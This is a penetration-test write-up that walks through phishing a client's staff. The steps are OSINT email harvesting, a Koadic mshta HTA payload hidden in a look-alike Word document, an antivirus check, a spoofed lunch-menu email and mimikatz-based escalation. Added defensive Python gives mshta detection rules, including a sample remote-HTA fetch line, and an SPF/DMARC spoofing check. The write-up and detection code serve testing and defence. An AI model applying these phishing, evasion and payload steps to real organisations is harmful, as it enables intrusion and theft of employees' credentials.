Black-box Penetration Testing

The goal was straightforward: see how vulnerable the organization is from an external perspective and test the effectiveness of the security controls that are managed enterprise-wide. Apart from the organization's name, we were given “ZERO” information to perform an external black-box penetration test.

This external black-box penetration test was performed for a client we will call Hackme.


We started with some Open Source Intelligence (OSINT) 101 :). There are many open source intelligence tools to help with gathering emails, subdomains, hosts, employee names and so on from various public sources such as search engines and Shodan. There is a comprehensive list of such tools here.

Using many open source intelligence tools, we obtained publicly available documents relating to the organization.

With Google dorks to the rescue, we ran some basic search strings: “site:* ext:xls OR ext:docx OR ext:pptx”.


Obviously, our aim was not to eagerly hunt for documents. Rather, our goal was to understand the organization's naming convention by looking at the metadata of the documents, which is found in the “properties” section of the file (most notably Microsoft Word, PowerPoint and Excel). One can also use FOCA for this.

From this, I noticed that employee emails followed a specific naming convention: the first letter of the first name + last name @ the domain, for example [email protected].

Armed with this knowledge, we pulled from LinkedIn the list of all current employees of Hackme using the following Google dork syntax: – inurl:dir “at Hackme” “Current”. A typical example is shown below using Google Inc as a reference company.

By hacking together a script to automate the process, we copied out the first names, last names and roles of the current employees of Hackme.

A tiring approach is to manually crawl through the Google result pages searching for these names and roles; alternatively, one can use GoogleScraper:

GoogleScraper -m http --keyword "– inurl:dir 'at Hackme' 'Current'" --num-pages-for-keyword 3 --output-filename output.json

Result: (screenshot)

Again, I leave the possibilities to your imagination, but you can easily convert this to a .csv file using whatever converter works for you.

Then, using your favourite text editor (Word merge, Notepad++, etc.) or some good scripting skills, combine the first name + last name to form your email list.

Feed our Target list a Payload

Since we are simulating a black-box penetration test, we chose (just as an attacker would actually do) code execution using malicious payloads. Basically, we thought of creating a payload and sending it via email to employees of Hackme.

We also know that it is common practice for some file types/extensions to be blocked by the organization's email filters, to limit exposure to risk.

This then brings us to using Koadic C3 COM Command and Control, a decent framework just like your Meterpreter or Empire.

What made it really stand out, aside from the beautiful interface, is that it allows one to dump hashes, download/upload files, execute commands, bypass UAC, scan the local network for open SMB, pivot to another machine, load mimikatz and much more.

So we ran Koadic and set the necessary variables, using the “stager/js/mshta” module (serves payloads in memory using MSHTA.exe HTML Applications).

The result was a spawned HTA payload URL, as evidenced in the screenshot above. However, we need our targets to execute our payload as “mshta payload_url”.

Lately, HTA payloads have been used as a web attack vector and also to drop malware on a victim's PC. Now we have to get this payload past our victim's various defenses.

Here comes the tricky part: we needed a way to have the victim run “mshta payload_url” without our payload being spawned as a child process of mshta.exe, as we suspected this organization's blue team may flag this.

Fortunately, we saw the tip on the left from Matt Nelson, and interestingly, the team at NCC Group have this implemented in Demiguise.
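That concern is exactly the detection a blue team can write. The following Python is an added example (not from the original post) that runs simple process-lineage rules over constructed Sysmon-style process-creation events: an Office application spawning mshta.exe, mshta.exe handed a remote URL, and mshta.exe spawning a command interpreter. The events, file paths and the TEST-NET address are all constructed.

```python
import re

# Constructed sample events in the shape of Sysmon Event ID 1 (process create); not real telemetry.
SAMPLE_EVENTS = [
    {"pid": 4120, "ppid": 812, "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmd": '"WINWORD.EXE" /n "C:\\Users\\u\\Downloads\\New Lunch Menu.docx"'},
    {"pid": 5208, "ppid": 4120, "image": r"C:\Windows\System32\mshta.exe",
     "cmd": "mshta http://203.0.113.10/stage.hta"},
    {"pid": 5300, "ppid": 5208, "image": r"C:\Windows\System32\cmd.exe",
     "cmd": "cmd /c whoami"},
    {"pid": 6001, "ppid": 700, "image": r"C:\Windows\System32\mshta.exe",
     "cmd": "mshta C:\\ProgramData\\Vendor\\installer.hta"},   # benign local HTA, parent unknown
    {"pid": 6100, "ppid": 700, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
]

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "rundll32.exe"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)

def basename(path):
    """Lower-cased file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()

def flag_mshta_chains(events):
    """Return (pid, rule) alerts; parent lookup is by ppid within the supplied events."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        name = basename(e["image"])
        parent = by_pid.get(e["ppid"])
        pname = basename(parent["image"]) if parent else ""
        if name == "mshta.exe" and pname in OFFICE:
            alerts.append((e["pid"], "office_spawned_mshta"))
        if name == "mshta.exe" and URL_RE.search(e["cmd"]):
            alerts.append((e["pid"], "mshta_remote_url"))
        if name in SHELLS and pname == "mshta.exe":
            alerts.append((e["pid"], "mshta_child_shell"))
    return alerts

if __name__ == "__main__":
    for pid, rule in flag_mshta_chains(SAMPLE_EVENTS):
        print(pid, rule)
```

The third rule is the one the paragraph says the attacker is trying to avoid, which is why the first two (parent is Office, argument is a URL) matter: they fire on the mshta.exe launch itself rather than on what it later spawns.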

So here is our final payload saved as a .hta file.

The next step usually is to send our .hta payload as an embedded OLE object.

The expected attack scenario was:

Send a Microsoft Word document with our .hta payload embedded as an OLE object.

Get the user to open the Word document and the embedded OLE object.

This spawns a new process and we get shell access into our victim's PC.

Now we get to the interesting part: we need our victim to open the Microsoft Word document and our payload.

To do this, we need a convincing story, because users are getting smarter. So we headed back to doing more recon.

… and more recon

We need to learn more about Hackme, specifically its culture and employee behavior. The question we kept asking ourselves was “what would interest the employees?”

Where else to get this information than Glassdoor, a platform that gives you the inside scoop on companies through employee reviews about salaries, benefits, and the pros and cons of working with the company.

After poring through reviews of Hackme on Glassdoor, we found some common themes:


Some employees felt mobility was a challenge, as the office is a considerable distance from residential areas.

Employees love the organization because they get free lunch.

But wait!

As the popular saying goes, the fastest way to a man's heart is through his stomach. So what better way to get the employees to open our payload-embedded Word document?

Send them an email letting them know there is a change in the FREE LUNCH menu starting from tomorrow.

Rather than send a random phishing email to employees that could be spotted easily, we decided an apparently genuine email would be ideal, complete with the Hackme email signature and respecting the organization's email culture.

Now, how do we make our email more credible? By sending an email to Customer Service/Help Desk with a support request and observing the email signature in the response.

… recon once more???

We went to LinkedIn to look for the name of either the HR Manager, Logistics Manager or Admin Manager (whichever is appropriate) of Hackme. We carefully crafted an email signature with the name we chose.

We are halfway through sending our payload now. Have some patience and read on…

It’s time to send our payload

From the metadata recon done earlier, we could tell what our target organization's document headers and footers looked like.

I then created a new Word document like the one shown below, a spitting image of the Hackme document template with matching headers/footers.

Then we embedded our .hta as an OLE object: Microsoft Word Document >> Insert >> Object >> Package. We changed the icon to Microsoft Word's icon and also the caption to reflect our message.

Change the icon to Microsoft Word's icon and also change the caption to reflect your message.

Remember the antivirus!!!

To check the AV detection rate of our payload, and to see whether it would be flagged as malicious by Hackme's antivirus solution (if any), we did a quick AV scan. The scanning service was chosen because, according to them, they do not distribute payload samples to AV companies. We scanned both the maldoc and the .hta file.

AV scan of our .hta payload (0 detections)

It’s Time to Send our Email

If the target organization does not have SPF, DKIM and DMARC configured, one can easily spoof the HR Manager, Logistics Manager or Admin Manager's email address.
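As an added example (not from the original post), this Python evaluates a domain's SPF and DMARC TXT records for the spoofing gap described above: a missing or non-enforcing record lets a plain From: spoof be delivered. The records are constructed strings; DKIM is not checked because it is published per selector rather than in one record. The assumption encoded here is that DMARC only stops the spoof when p=quarantine or p=reject applies to 100% of mail.

```python
import re

def parse_dmarc(txt):
    """Parse a DMARC TXT record ('v=DMARC1; p=reject; ...') into a tag dict; None if absent."""
    if not txt or not txt.strip().lower().startswith("v=dmarc1"):
        return None
    tags = {}
    for part in txt.split(";"):
        if "=" in part:
            k, v = part.split("=", 1)
            tags[k.strip().lower()] = v.strip()
    return tags

def spf_all_qualifier(txt):
    """Return the qualifier on the 'all' mechanism ('-', '~', '?', '+'); None if no SPF record."""
    if not txt or not txt.strip().lower().startswith("v=spf1"):
        return None
    m = re.search(r"(?:^|\s)([-~?+]?)all(?:\s|$)", txt.lower())
    return (m.group(1) or "+") if m else "?"   # no 'all' term evaluates as neutral

def spoofing_posture(spf_txt, dmarc_txt):
    """Summarise whether a plain From: spoof of this domain would be blocked."""
    findings = []
    q = spf_all_qualifier(spf_txt)
    if q is None:
        findings.append("no SPF record")
    elif q != "-":
        findings.append("SPF 'all' qualifier is %sall, not -all" % q)
    d = parse_dmarc(dmarc_txt)
    policy = (d or {}).get("p", "none").lower()
    pct = (d or {}).get("pct", "100")
    enforced = policy in ("quarantine", "reject") and pct == "100"
    if d is None:
        findings.append("no DMARC record")
    elif not enforced:
        findings.append("DMARC not enforced (p=%s, pct=%s)" % (policy, pct))
    return {"spoofable": not enforced, "findings": findings}

# Constructed records for a weak and a hardened domain (not real DNS data).
WEAK = spoofing_posture("v=spf1 include:_spf.example.net ~all",
                        "v=DMARC1; p=none; rua=mailto:dmarc@example.com")
STRONG = spoofing_posture("v=spf1 include:_spf.example.net -all",
                          "v=DMARC1; p=reject; pct=100")
```

To run it against live domains, feed in the TXT records of the domain and of _dmarc.<domain> from your resolver; a ~all SPF with an enforced DMARC still blocks the spoof, which is why the verdict keys on DMARC.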

In this case, I created a Gmail account (yes, Gmail works too) using the Logistics Manager's first name and last name, and then spiced it up with his signature, which was obtained earlier.

Let the shells in

Shortly after sending the email, within a period of about 3 minutes, we had at least 30 shell connections! W00t!!!

What next?

The rest, as they often say, is history. From here on, using the mimikatz modules, we escalated privileges, dumped hashes, scanned the local network of Hackme, pivoted into other PCs, browsed the target's file systems and even became domain admins, etc.

In conclusion

All in all, this was a very fun engagement. While it may take an attacker a month, two months or a year of dedication to break into an organization through a loophole at the system level, it can be fairly easy for one to gain access by exploiting the human factor.

“Once you understand your target environment, coming up with a creative means of gaining access to the environment becomes fairly easy”.

The moral of the exercise is: recon, recon and more recon, for a wise man once said

“Give me six hours to chop down a tree and I will spend the first four sharpening the axe”.
